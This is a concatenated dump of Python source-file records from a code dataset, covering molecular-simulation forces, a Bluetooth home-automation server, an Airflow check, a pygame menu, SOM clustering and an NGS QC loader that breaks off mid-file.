softCoreFunction += 'reff_sterics = (0.5*(1.0-lambdaLJ) + ((r/sigma)^6));'\n softCoreFunction += 'sigma=0.5*(sigma1+sigma2); epsilon = sqrt(epsilon1*epsilon2)'\n #Define the system force for this function and its parameters\n SoftCoreForce = mm.CustomNonbondedForce(softCoreFunction)\n SoftCoreForce.addGlobalParameter('lambdaLJ', self.lambdaLJ) #Throughout, should follow convention that lambdaLJ=1.0 is fully-interacting state\n SoftCoreForce.addPerParticleParameter('sigma')\n SoftCoreForce.addPerParticleParameter('epsilon')\n\n #Will turn off electrostatics completely in the original non-bonded force\n #In the end-state, only want electrostatics inside the alchemical molecule\n #To do this, just turn ON a custom force as we turn OFF electrostatics in the original force\n ONE_4PI_EPS0 = 138.935456 #in kJ/mol nm/e^2\n soluteCoulFunction = '(1.0-(lambdaQ^2))*ONE_4PI_EPS0*charge/r;'\n soluteCoulFunction += 'ONE_4PI_EPS0 = %.16e;' % (ONE_4PI_EPS0)\n soluteCoulFunction += 'charge = charge1*charge2'\n SoluteCoulForce = mm.CustomNonbondedForce(soluteCoulFunction)\n #Note this lambdaQ will be different than for soft core (it's also named differently, which is CRITICAL)\n #This lambdaQ corresponds to the lambda that scales the charges to zero\n #To turn on this custom force at the same rate, need to multiply by (1.0-lambdaQ**2), which we do\n SoluteCoulForce.addGlobalParameter('lambdaQ', self.lambdaQ) \n SoluteCoulForce.addPerParticleParameter('charge')\n \n #Also create custom force for intramolecular alchemical LJ interactions\n #Could include with electrostatics, but nice to break up\n #We could also do this with a separate NonbondedForce object, but it would be a little more work, actually\n soluteLJFunction = '4.0*epsilon*x*(x-1.0); x = (sigma/r)^6;'\n soluteLJFunction += 'sigma=0.5*(sigma1+sigma2); epsilon=sqrt(epsilon1*epsilon2)'\n SoluteLJForce = mm.CustomNonbondedForce(soluteLJFunction)\n SoluteLJForce.addPerParticleParameter('sigma')\n SoluteLJForce.addPerParticleParameter('epsilon')\n\n #=== Set other interaction parameters ===\n rcut = NBForce.getCutoffDistance() #default in nanometers\n nonbondedMethod = min(NBForce.getNonbondedMethod(),2)\n print(\"...alchemify: Cutoff method: {}\".format(nonbondedMethod))\n print(\"...alchemify: compare to cutoff nonperiodic: {}\".format(mm.CustomNonbondedForce.CutoffPeriodic))\n\n #Set other soft-core parameters as needed\n SoftCoreForce.setCutoffDistance(rcut)\n SoftCoreForce.setNonbondedMethod(nonbondedMethod)\n #SoftCoreForce.setUseSwitchingFunction(True)\n #SoftCoreForce.setSwitchingDistance(9.0*u.angstroms)\n SoftCoreForce.setUseLongRangeCorrection(True) \n\n #Set other parameters as needed - note that for the solute force would like to set no cutoff\n #However, OpenMM won't allow a bunch of potentials with cutoffs then one without...\n #So as long as the solute is smaller than the cut-off, won't have any problems!\n SoluteCoulForce.setCutoffDistance(rcut)\n SoluteCoulForce.setNonbondedMethod(nonbondedMethod)\n #SoluteCoulForce.setUseSwitchingFunction(True)\n #SoluteCoulForce.setSwitchingDistance(9.0*u.angstroms)\n SoluteCoulForce.setUseLongRangeCorrection(False) #DON'T want long-range correction here!\n\n SoluteLJForce.setCutoffDistance(rcut)\n SoluteLJForce.setNonbondedMethod(nonbondedMethod)\n #SoluteLJForce.setUseSwitchingFunction(True)\n #SoluteLJForce.setSwitchingDistance(9.0*u.angstroms)\n SoluteLJForce.setUseLongRangeCorrection(False) \n\n #=== Store the Functions and initial charges ===\n self.SoftCoreForce = SoftCoreForce\n self.SoluteCoulForce = SoluteCoulForce\n self.SoluteLJForce = SoluteLJForce\n self.NBForce = NBForce\n for ind in range(self.system.getNumParticles()):\n #Get current parameters in non-bonded force\n [charge, sigma, epsilon] = NBForce.getParticleParameters(ind)\n self.q0s[ind] = charge\n\n\n def setupSolute(self,soluteIndices):\n \"\"\"Setup force fields and interaction groups to work with designated solute indices\n \n Parameters\n ----------\n soluteIndices : list\n list of atom.idx for atom in residue in solute molecule.\n note that getParticleParameters() is 0-indexed, but have to be careful to call atom.index instead of atom.in (1-based indexing, for pdb) \n \"\"\"\n assert not self.soluteInitialized, \"Solute previously initialized, can't add force to system again\"\n\n alchemicalParticles = set(soluteIndices)\n chemicalParticles = set(range(self.system.getNumParticles())) - alchemicalParticles\n \n #Loop over all particles and add to custom forces\n #As we go, will also collect full charges on the solute particles\n #AND we will set up the solute-solute interaction forces\n alchemicalCharges = [[0]]*len(soluteIndices)\n for ind in range(self.system.getNumParticles()):\n #Get current parameters in non-bonded force\n [charge, sigma, epsilon] = self.NBForce.getParticleParameters(ind)\n #Make sure that sigma is not set to zero! Fine for some ways of writing LJ energy, but NOT OK for soft-core!\n if sigma/u.nanometer == 0.0:\n newsigma = 0.3*u.nanometer #This 0.3 is what's used by GROMACS as a default value for sc-sigma\n else:\n newsigma = sigma\n #Add the particle to the soft-core force (do for ALL particles)\n self.SoftCoreForce.addParticle([newsigma, epsilon])\n #Also add the particle to the solute only forces\n self.SoluteCoulForce.addParticle([charge])\n self.SoluteLJForce.addParticle([sigma, epsilon])\n #If the particle is in the alchemical molecule, need to set it's LJ interactions to zero in original force\n if ind in soluteIndices:\n newcharge = self.lambdaQ*self.q0s[ind]\n self.NBForce.setParticleParameters(ind, newcharge, sigma, epsilon*0.0)\n #And keep track of full charge so we can scale it right by lambda\n alchemicalCharges[soluteIndices.index(ind)] = charge\n\n #Now we need to handle exceptions carefully\n for ind in range(self.NBForce.getNumExceptions()):\n [p1, p2, excCharge, excSig, excEps] = self.NBForce.getExceptionParameters(ind)\n #For consistency, must add exclusions where we have exceptions for custom forces\n self.SoftCoreForce.addExclusion(p1, p2)\n self.SoluteCoulForce.addExclusion(p1, p2)\n self.SoluteLJForce.addExclusion(p1, p2)\n\n #Only compute interactions between the alchemical and other particles for the soft-core force\n self.SoftCoreForce.addInteractionGroup(alchemicalParticles, chemicalParticles)\n\n #And only compute alchemical/alchemical interactions for other custom forces\n self.SoluteCoulForce.addInteractionGroup(alchemicalParticles, alchemicalParticles)\n self.SoluteLJForce.addInteractionGroup(alchemicalParticles, alchemicalParticles)\n\n #Now add forces to system. Shouldn't be undone unless we change a system force field in context\n self.system.addForce(self.SoftCoreForce)\n self.system.addForce(self.SoluteCoulForce)\n self.system.addForce(self.SoluteLJForce)\n \n self.chemicalParticles = chemicalParticles\n self.alchemicalParticles = alchemicalParticles\n self.alchemicalCharges = alchemicalCharges\n self.soluteInitialized = True\n\n #def updateState(self,context,lambdaLJ,lambdaQ):\n\n\n","sub_path":"alchemify.py","file_name":"alchemify.py","file_ext":"py","file_size_in_byte":11255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"329355061","text":"#instalacao das bibliotecas bluetooths\n#sudo apt install python-pip python-dev ipython\n#sudo apt install bluetooth libbletooth-dev\n#sudo pip install pybluez\nimport bluetooth\n#import de home_controller.py\nfrom home_controller import *\n\nhost = \"\"\nport = 1\nserver = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\n\ntry:\n server.bind((host, port))\nexcept:\n print(\"ERRO\")\n \nserver.listen(1)\nclient, address = server.accept()\n\nprint(\"Conectado a:\", address)\n\nwhile True:\n data = client.recv(1024)\n \n if data is not None:\n print(data)\n \n #corredor\n if data == b'apaga_corredor':\n acende_apaga('corredor', 0, True)\n elif data == b'acende_corredor':\n acende_apaga('corredor', 1, True)\n \n if data == b'fechar_portao':\n acende_apaga('portao', 0, True)\n elif data == b'abrir_portao':\n acende_apaga('portao', 1, True)\n \n #SEGUNDO LED\n if data == b'apaga_banheiro':\n acende_apaga('banheiro_1', 0, True)\n elif data == b'acende_banheiro':\n acende_apaga('banheiro_1', 1, True)\n \n #TERCEIRO LED \n if data == b'apaga_banheiro_2':\n acende_apaga('banheiro_2', 0, True)\n \n elif data == b'acende_banheiro_2':\n acende_apaga('banheiro_2', 1, True)\n \n #QUARTO LED \n if data == b'apaga_quarto':\n acende_apaga('quarto_1', 0, True)\n \n elif data == b'acende_quarto':\n acende_apaga('quarto_1', 1, True)\n \n #SEXTO LED \n if data == b'apaga_cozinha':\n acende_apaga('cozinha', 0, True)\n \n elif data == b'acende_cozinha':\n acende_apaga('cozinha', 1, True)\n \n #SETIMO LED \n if data == b'apaga_quarto_2':\n acende_apaga('quarto_2', 0, True)\n \n elif data == b'acende_quarto_2':\n acende_apaga('quarto_2', 1, True)\n\n #OITAVO LED \n if data == b'apaga_sala':\n acende_apaga('sala', 0, True)\n \n elif data == b'acende_sala':\n acende_apaga('sala', 1, True)","sub_path":"thinkAPI/APIRaspberry/api_bluetooth.py","file_name":"api_bluetooth.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"605659990","text":"from airflow.contrib.hooks.bigquery_hook import BigQueryHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass DataQualityOperator(BaseOperator):\n\n ui_color = '#89DA59'\n\n @apply_defaults\n def __init__(self,\n conn_id=\"\",\n sql_test_cases={},\n *args, **kwargs):\n \"\"\" \n Constructor method where the parameters are initialized.\n params:\n conn_id = represent the identifier of the connector to the database.\n \n sql_test_cases = requesent the queries aimed to check the quality of the data\n and the expected result of the queries.\n \"\"\"\n\n super(DataQualityOperator, self).__init__(*args, **kwargs)\n self.conn_id=conn_id\n self.sql_test_cases=sql_test_cases\n\n\n def execute(self, context):\n \"\"\" \n This method check the quality of the data given the input test cases indicated in the sql_test_cases\n dictionary.\n \"\"\"\n bigquery=BigQueryHook(bigquery_conn_id=self.conn_id)\n found_errors=[]\n for query, expected_result in self.sql_test_cases.items():\n records = bigquery.run_query(sql=query)\n if len(records) < 1 or records[0][0] != expected_result:\n found_errors.append(query)\n \n if len(found_errors) > 0:\n raise ValueError(f\"The following query test cases were not successful {found_errors}\")\n \n self.log.info('DataQualityOperator has been executed')","sub_path":"plugin/operators/data_quality.py","file_name":"data_quality.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"16609269","text":"# 任一个英文的纯文本文件,统计其中的单词出现的个数。\nimport re\n\ndef counter(file):\n with open(file,'r') as f:\n # text = f.readlines()\n sum = 0\n # f.readlines()返回一个由文本每行字符串为元素组成的列表\n for line in f.readlines():\n sum += len(re.findall(r'\\w+',line))\n return sum\nif __name__ == \"__main__\":\n file = './test.txt'\n print(counter(file))","sub_path":"codes/0004/words-counter.py","file_name":"words-counter.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"312018306","text":"import os\nimport sys\n\nimport pygame.freetype\n\nsys.path.insert(1, os.path.abspath(\".\"))\n\nfrom utils.enum import *\nfrom utils.load import *\nfrom bucketGame.bucketGame import *\nfrom lionGame.lionGame import *\nfrom sheepGame.sheepGame import *\nfrom create_config import *\n\nBLUE = (106, 159, 181)\nWHITE = (255, 255, 255)\n\nWIDTH = 800\nHEIGHT = 800\n\n\nclass UIElement(pygame.sprite.Sprite):\n\n def __init__(self, center_position, text, font_size, bg_rgb, text_rgb, action=None):\n\n self.mouse_over = False\n\n default_image = create_surface_with_text(\n text=text, font_size=font_size, text_rgb=text_rgb, bg_rgb=bg_rgb\n )\n\n highlighted_image = create_surface_with_text(\n text=text, font_size=font_size * 1.2, text_rgb=text_rgb, bg_rgb=bg_rgb\n )\n\n self.images = [default_image, highlighted_image]\n\n self.rects = [\n default_image.get_rect(center=center_position),\n highlighted_image.get_rect(center=center_position),\n ]\n\n self.action = action\n\n super().__init__()\n\n @property\n def image(self):\n return self.images[1] if self.mouse_over else self.images[0]\n\n @property\n def rect(self):\n return self.rects[1] if self.mouse_over else self.rects[0]\n\n def update(self, mouse_pos, mouse_up):\n if self.rect.collidepoint(mouse_pos):\n self.mouse_over = True\n if mouse_up:\n return self.action\n else:\n self.mouse_over = False\n\n def draw(self, surface):\n surface.blit(self.image, self.rect)\n\n\ndef create_surface_with_text(text, font_size, text_rgb, bg_rgb):\n font = pygame.freetype.SysFont(\"Courier\", font_size, bold=True)\n surface, _ = font.render(text=text, fgcolor=text_rgb, bgcolor=bg_rgb)\n return surface.convert_alpha()\n\n\ndef title_screen(screen):\n start_bucket = UIElement(\n center_position=(400, 300),\n font_size=30,\n bg_rgb=BLUE,\n text_rgb=WHITE,\n text=\"Start Bucket Game\",\n action=GameState.BUCKET,\n )\n\n create_bucket = UIElement(\n center_position=(400, 350),\n font_size=15,\n bg_rgb=BLUE,\n text_rgb=WHITE,\n text=\"Create Instance\",\n action=GameState.CREATE,\n )\n\n start_lion = UIElement(\n center_position=(400, 400),\n font_size=30,\n bg_rgb=BLUE,\n text_rgb=WHITE,\n text=\"Start Lion Game\",\n action=GameState.LION,\n )\n\n start_sheep = UIElement(\n center_position=(400, 500),\n font_size=30,\n bg_rgb=BLUE,\n text_rgb=WHITE,\n text=\"Start Sheep Game\",\n action=GameState.SHEEP,\n )\n\n quit_btn = UIElement(\n center_position=(400, 600),\n font_size=30,\n bg_rgb=BLUE,\n text_rgb=WHITE,\n text=\"Quit\",\n action=GameState.QUIT,\n )\n\n buttons = [start_bucket, start_lion, start_sheep, quit_btn, create_bucket]\n clickables = pygame.sprite.RenderUpdates(buttons)\n\n clock = pygame.time.Clock()\n\n while True:\n clock.tick(15)\n\n mouse_up = False\n\n for event in pygame.event.get():\n if event.type == QUIT:\n return GameState.QUIT\n elif event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n mouse_up = True\n\n screen.fill(BLUE)\n\n for button in buttons:\n ui_action = button.update(pygame.mouse.get_pos(), mouse_up)\n\n if ui_action is not None:\n return ui_action\n\n clickables.draw(screen)\n pygame.display.flip()\n\n\ndef win_screen(screen):\n image = load_image('youwin.jpg')\n sound = load_sound('winning.wav')\n sound.play()\n clock = pygame.time.Clock()\n\n while True:\n clock.tick(15)\n\n for event in pygame.event.get():\n if event.type == KEYDOWN and event.key == K_ESCAPE:\n return GameState.TITLE\n\n screen.fill(BLUE)\n screen.blit(image, (150, 150))\n pygame.display.flip()\n\n\ndef lose_screen(screen):\n image = load_image('youlose.jpg')\n sound = load_sound('loosing.wav')\n sound.play()\n clock = pygame.time.Clock()\n\n while True:\n clock.tick(15)\n\n for event in pygame.event.get():\n if event.type == KEYDOWN and event.key == K_ESCAPE:\n return GameState.TITLE\n\n screen.fill(BLUE)\n screen.blit(image, (150, 150))\n pygame.display.flip()\n\n\ndef main():\n pygame.init()\n pygame.mixer.pre_init(44100, 16, 2, 4096)\n\n screen = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.display.set_caption('Minizinc Fever')\n\n game_state = GameState.TITLE\n\n clock = pygame.time.Clock()\n\n while True:\n clock.tick(15)\n\n if game_state == GameState.TITLE:\n game_state = title_screen(screen)\n\n if game_state == GameState.BUCKET:\n path = find_file()\n game_state = gameBucket(screen, path)\n screen = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.mouse.set_visible(1)\n\n if game_state == GameState.CREATE:\n conf = CreateConfigSeaux()\n conf.start()\n game_state = GameState.TITLE\n\n if game_state == GameState.LION:\n path = find_file()\n game_state = gameLion(screen, path)\n screen = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.mouse.set_visible(1)\n\n if game_state == GameState.SHEEP:\n game_state = gameSheep(screen)\n screen = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.mouse.set_visible(1)\n\n if game_state == GameState.WIN:\n game_state = win_screen(screen)\n\n if game_state == GameState.LOSE:\n game_state = lose_screen(screen)\n\n if game_state == GameState.QUIT:\n pygame.quit()\n return\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"646239302","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#lab 5-2\n# 6. В списке, состоящем из целых элементов, вычислить:\n# 1) номер максимального элемента списка;\n# 2) произведение элементов списка, расположенных между первым и вторым нулевыми элементами.\n# Преобразовать список таким образом, чтобы в первой его половине располагались элементы,\n# стоявшие в нечетных позициях, а во второй половине - элементы, стоявшие в четных позициях.\n\nfrom functools import reduce\n\n\ninitlst = [int(i) for i in input('Введите список целых чисел через пробел ').split()]\nindmax = initlst.index(max(initlst)) # Получаем индекс максимального числа\nprint(f\"номер максимального элемента списка {indmax}.\")\nzeroelem = [i for i,d in enumerate(initlst) if d==0] # Плдучаем список индексов всех нулевых элементов\nif len(zeroelem) > 1:\n x = zeroelem[0]\n y = zeroelem[1]\n mlt = reduce(lambda x, y: x*y, initlst[x+1:y])\n print(f\"Произведение элементов списка, расположенных между первым и вторым нулевыми элементами: {mlt}\")\nelse:\n print(\"Нельзя получить произведение элементов между нулевыми элементами списка\")\nprint([x for i, x in enumerate(initlst) if not i%2] + [x for i, x in enumerate(initlst) if i%2])\n\n","sub_path":"lab5/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"425795144","text":"import unittest\nfrom quant.gui.gui_logic import ThreadWorker\nfrom PyQt5 import QtWidgets\nimport sys,traceback\n\n\nclass MyWidget(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n\n self.btn = QtWidgets.QPushButton('test',self)\n self.btn.clicked.connect(self.clicked)\n\n self.edit = QtWidgets.QTextEdit(self)\n self.btn.move(10,10)\n self.edit.move(30,50)\n\n def clicked(self):\n print('clicked')\n self.thread = ThreadWorker()\n try:\n self.thread.signal.connect(self.callback)\n self.thread.start()\n except:\n traceback.print_exc()\n def callback(self):\n self.btn.setText('callback')\n self.edit.append('okok')\n\n\nclass TestGuiThread(unittest.TestCase):\n\n def test_gui(self):\n app = QtWidgets.QApplication(sys.argv)\n win = MyWidget()\n\n win.show()\n app.exec_()","sub_path":"quant/gui/tests/test_gui_thread.py","file_name":"test_gui_thread.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"267891095","text":"import pkgutil\nimport inspect\n\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\n\nimport accountifie.toolkit.utils as utils\nfrom models import ReportDef\n\n\ndef get_report(rpt_id, company_id, version=None):\n try:\n report = ReportDef.objects.get(name=rpt_id)\n rpt_path = report.path\n rpt_name = report.name\n except:\n return None\n \n loader = pkgutil.get_loader(rpt_path)\n module = loader.load_module(rpt_path)\n \n rpt = None\n for name,obj in inspect.getmembers(module):\n if name == rpt_name:\n rpt = obj(company_id)\n break\n \n return rpt\n\n\ndef get_report_cols(path_name, company_ID,as_of=None, col_tag=None):\n rpt = get_report(path_name, company_ID)\n if as_of:\n rpt.config_fromdate(as_of)\n elif col_tag:\n rpt.config_fromtag(col_tag)\n else:\n rpt.config_fromdate('today')\n\n return rpt.columns, rpt.column_order\n\n\ndef report_prep(request, id):\n as_of = request.GET.get('date', None)\n col_tag = request.GET.get('col_tag', None)\n\n format = request.GET.get('format', 'html')\n company_ID = request.GET.get('company', utils.get_company(request))\n path = request.GET.get('path', None)\n report = get_report(id, company_ID)\n gl_strategy = request.GET.get('gl_strategy', None)\n\n if report is None:\n msg = \"Report %s does not exist\" % id\n return render_to_response('rpt_doesnt_exist.html', RequestContext(request, {'message': msg})), False, None\n\n if company_ID not in report.works_for:\n msg = \"This ain't it. Report not available for %s\" % report.company_name\n return render_to_response('rpt_doesnt_exist.html', RequestContext(request, {'message': msg})), False\n\n report.configure(as_of=as_of, col_tag=col_tag, path=path)\n report.set_gl_strategy(gl_strategy)\n return report, True, format\n\n\n","sub_path":"accountifie/reporting/rptutils.py","file_name":"rptutils.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"176428900","text":"import csv\nimport pygame\nimport random\nimport numpy as np\nimport time\nfrom sklearn import metrics\nfrom sklearn.cluster import KMeans\nimport hexagons\nimport matplotlib.pyplot as plt\n\nWINDOW_W=1000\nWINDOW_H=1000\n\nclass Dot:\n def __init__(self, cluster, coords):\n self.cluster = cluster\n self.c = np.array(coords)\n\nclass Node:\n def __init__(self, xy, dim):\n self.c = np.array(xy)\n\n w = []\n for _ in range(dim):\n w.append(random.uniform(-1, 1))\n self.w = np.array(w)\n\n def dist(self, dot):\n return np.linalg.norm(self.w - dot.c)\n\n def dist_to_node(self, node):\n return np.linalg.norm(self.w - node.w)\n\n def __str__(self):\n return \"({},{}):{}\".format(self.c[0], self.c[1], self.w)\n\n def __repr__(self):\n return self.__str__()\n\nclass SOM:\n def __init__(self, nrows, ncols, dim):\n nodes = []\n\n cur_x = 0\n cur_y = 0\n for r in range(nrows):\n new_row = []\n for c in range(ncols):\n new_row.append(Node((cur_x, cur_y), dim))\n cur_x += 1\n nodes.append(new_row)\n cur_x = 0\n cur_y += 1\n\n self.nodes = np.array(nodes)\n\n self.train_number = 1\n\n def train(self, dataset):\n cur_sigma = self.sigma()\n cur_nu = self.nu()\n cur_sigma = (2*cur_sigma**2)\n for _ in range(1):\n\n dot = np.random.choice(dataset)\n bmu = np.random.choice(np.ravel(self.nodes))\n bmu_dist = bmu.dist(dot)\n\n ns = np.ravel(self.nodes)\n # start = time.time()\n for n in ns:\n dist = n.dist(dot)\n if dist < bmu_dist:\n bmu = n\n bmu_dist = dist\n # end = time.time()\n # print('bmu', end-start)\n\n # start = time.time()\n for n in np.ravel(self.nodes):\n hij = np.exp(-((n.w-bmu.w)**2)/cur_sigma)\n n.w = n.w + cur_nu * hij * (dot.c - n.w)\n # end = time.time()\n # print('wei', end-start)\n bmu.w = bmu.w + cur_nu * (dot.c - bmu.w)\n\n self.train_number += 1\n\n def get_cluters(self, dataset, n_classes):\n nodes = self.nodes.ravel()\n counts = {node:0 for node in nodes}\n for p in dataset:\n d = 9999999\n cur = -1\n for w in nodes:\n dd = w.dist(p)\n if dd < d:\n d = dd\n cur = w\n counts[cur] += 1\n import operator\n centers = dict(sorted(counts.items(), key=operator.itemgetter(1), reverse=True)[:3])\n\n clusters = [-1] * len(dataset)\n counter = 0\n for p in dataset:\n d = 99999\n cur = -1\n for c in range(len(centers)):\n dd = nodes[c].dist(p)\n if dd < d:\n d = dd\n cur = c\n clusters[counter] = cur\n counter += 1\n return clusters\n\n def sigma(self):\n sigma0 = 1\n const = 10\n a = self.train_number/const\n if a > 10:\n a = 10\n return sigma0 * np.exp(-(a))\n\n def nu(self):\n sigma0 = 1\n const = 2000\n a = self.train_number/const\n if a > 10:\n a = 10\n return sigma0 * np.exp(-(a))\n\nCOLS = 15\nROWS = 15\ns = SOM(ROWS,COLS,2)\n\npygame.init()\nscreen = pygame.display.set_mode((WINDOW_W, WINDOW_H))\nclock = pygame.time.Clock()\nFPS = 5\n\ndef toc(x, y):\n x1 = int(x * int(WINDOW_W/(ROWS-1)))\n y1 = int(y * int(WINDOW_H/(COLS-1)))\n return (x1, y1)\n\ndef toc_ds(x,y):\n x1 = int(x * int(WINDOW_W/2) + int(WINDOW_W/2))\n y1 = int(y * int(WINDOW_H/2) + int(WINDOW_H/2))\n return (x1, y1)\n\ndef draw_som(screen, som):\n rows = len(s.nodes)\n cols = len(s.nodes[0])\n for r in range(rows):\n for c in range(cols):\n # pygame.draw.circle(screen, pygame.Color(255,255,255), toc(r,c), 3)\n node = s.nodes[r,c]\n pygame.draw.circle(screen, pygame.Color(255,0,0), toc_ds(node.w[0],node.w[1]), 3)\n\ndataset = []\nwith open('2d_dataset.csv') as csvf:\n reader = csv.reader(csvf)\n for row in reader:\n cluster = row[0]\n coords = [float(c) for c in row[1:-1]]\n dataset.append(Dot(cluster, coords))\n print(len(dataset))\n\ndef draw_dataset(screen, dataset):\n for dot in dataset:\n x,y = toc_ds(dot.c[0], dot.c[1])\n pygame.draw.circle(screen, pygame.Color(0,125,125), (x,y), 3)\n\nrunning = True\ncounter = 0\nfig = plt.figure(1)\nwhile running:\n # clock.tick(FPS)\n for e in pygame.event.get():\n if e.type == pygame.QUIT:\n running = False\n # if e.type == pygame.KEYDOWN:\n # if e.key == pygame.K_RETURN:\n # print('training')\n # for _ in range(100):\n # s.train(dataset)\n if counter % 100 == 0:\n print(\"counter\", counter)\n screen.fill((0,0,0))\n draw_dataset(screen, dataset)\n draw_som(screen, s)\n # centers = [[0.1,0.2,0.3]]\n centers = [x.c for x in s.nodes.ravel()]\n # weights = [[0.4,.3,.2]]\n weights = [[(x.w[0]+1)/2, (x.w[1]+1)/2, 0.1] for x in s.nodes.ravel()]\n # print(weights)\n hexagons.plot_hex(fig, centers, weights)\n plt.pause(0.001)\n pygame.display.update()\n # if counter == 0:\n # pygame.image.save(screen, \"images/som/som_00000_iter.png\")\n # if counter == 100:\n # pygame.image.save(screen, \"images/som/som_00100_iter.png\")\n # if counter == 1000:\n # pygame.image.save(screen, \"images/som/som_01000_iter.png\")\n # if counter == 5000:\n # pygame.image.save(screen, \"images/som/som_05000_iter.png\")\n # if counter == 10000:\n # pygame.image.save(screen, \"images/som/som_10000_iter.png\")\n if counter == 15000:\n # pygame.image.save(screen, \"images/som/som_15000_iter.png\")\n running = False\n # start = time.time()\n s.train(dataset)\n # print(s.get_cluters(dataset, 3))\n # end = time.time()\n # print('training', end - start)\n counter += 1\nplt.show()\n# print(s.get_cluters(dataset, 3))\ndataset_clusters = [x.cluster for x in dataset]\npred_dataset = s.get_cluters(dataset, 3)\n# pred_dataset = [x.w for x in s.nodes.ravel()]\n# kmeans = KMeans(3).fit(pred_dataset)\n# print(kmeans.labels_)\npred_dataset = np.random.randint(0, 2, size=len(dataset))\n\nprint('Adjusted Rand score:', metrics.adjusted_rand_score(dataset_clusters, pred_dataset))\nprint('Mutual Information based score:', metrics.adjusted_mutual_info_score(dataset_clusters, pred_dataset))\nprint('V-measure score:', metrics.v_measure_score(dataset_clusters, pred_dataset))\nprint('Fowlkes-Mallows score:', metrics.fowlkes_mallows_score(dataset_clusters, pred_dataset))","sub_path":"som.py","file_name":"som.py","file_ext":"py","file_size_in_byte":6865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"62989093","text":"'''\nCreated on 24 Jan 2016\n\n@author: Admin\n'''\n#Required imports\nfrom __future__ import print_function\nimport MySQLdb\nimport sys\nimport warnings\nimport numpy as np\nimport bisect\nimport scipy\nfrom scipy.optimize import curve_fit\nimport scipy.stats as stat\nimport matplotlib.pyplot as pl\nimport re\nfrom numpy import nan\n\n#'''\n###Write out stdout to a file\n#See if can redirect output to a file\nfile_loc = sys.path[0]\nfile_name = file_loc + \"\\\\outputs_log.txt\"\nsys.stdout = open(file_name, 'w')\n#'''\n#Load in a bunch of runs\n#Later on this will trigger from Matt's transfer program\n\n#Connect to the database- user with select privileges only\ntry:\n db = MySQLdb.connect(\"localhost\",sys.argv[1],sys.argv[2], \"ngsqc\" ) #Pass username and password as command line arguments\n\nexcept:\n sys.exit(\"Enter correct username and password!\")\n\ncursor = db.cursor()\n \n#Open the list of runs created with GenerateRunList.py\noutpath = sys.path[0]\noutpath = outpath + \"\\\\runs.txt\"\nfile_of_runs = open(outpath, 'r')\n\n#Import all runs from list of runs generated above- this is currently all of the runs in the database\nfor run in file_of_runs:\n #print(run) # Keep track of where we are\n run_for_import = run.rstrip() #Trailing newline /n means select otherwise doesn't work\n print(run_for_import) # Keep track of where we are\n #run_for_import = '160104_M02641_0062_000000000-AL603' #This is a test\n #run_for_import = '130405_M00766_0006_000000000-A3FNU' #This is a test\n #run_for_import = '130708_M00766_0023_000000000-A20R8' #This is a test\n #run_for_import = '140314_M00766_0027_000000000-A7C5E' #This is a test\n #run_for_import = '130206_M00766_0002_000000000-A23JM' #This is a test\n #run_for_import = '130510_M00766_0014_000000000-A3PFJ' #This is a test\n #How long is each read?\n sql_command = \"\"\" SELECT ReadNumber, NumberOfCycles, Indexed\n FROM Rds INNER JOIN LinkMiSeqRunRds\n ON Rds.ReadID = LinkMiSeqRunRds.ReadID\n WHERE LinkMiSeqRunRds.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\"\n cursor.execute(sql_command)\n reads_info = cursor.fetchall()\n reads_info_arr = np.array(reads_info)\n #Convert array from string type to integer type\n reads_info_arr_int = reads_info_arr.astype(int)\n #print(reads_info)\n #print(reads_info_arr)\n #print(reads_info_arr[:,1])\n\n ind_reads = 0\n\n for read_extract in reads_info_arr_int: \n #print(read_extract)\n if read_extract[2] == 0:\n #Read is not an index read\n #print(read_extract[1])\n if ((read_extract[0]) == 1 ) and (read_extract[1] == reads_info_arr_int[:,1].max()):\n #R1 is the first one\n read1_length = read_extract[1]\n #print(\"read 1 is \" + str(read1_length))\n else:\n #R2 is the last one\n read2_length = read_extract[1]\n #print(\"read 2 is \" + str(read2_length))\n elif read_extract[2] == 1:\n ind_reads += read_extract[1]\n #print(\"index is \" + str(ind_reads))\n else:\n raise Exception(\"Read is not properly identified as either not index or an index read\")\n #How many reads there are from this way of counting them (all index reads and R1 and R2)\n num_cycles_reads = sum(reads_info_arr_int[:,1])\n\n #Is the run complete?\n sql_command = \"\"\" SELECT MAX(ExtractionMetrics.CycleID)\n FROM ExtractionMetrics\n WHERE ExtractionMetrics.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\"\n cursor.execute(sql_command)\n current_run_extracted = cursor.fetchall()[0][0]\n #print(\"Extracted\")\n #print(current_run_extracted)\n \n if current_run_extracted == None:\n #warnings.warn(\"There is no InterOp data for this run\")\n print(\"There is no InterOp data for this run\")\n #Break out of the loop and go on with the next 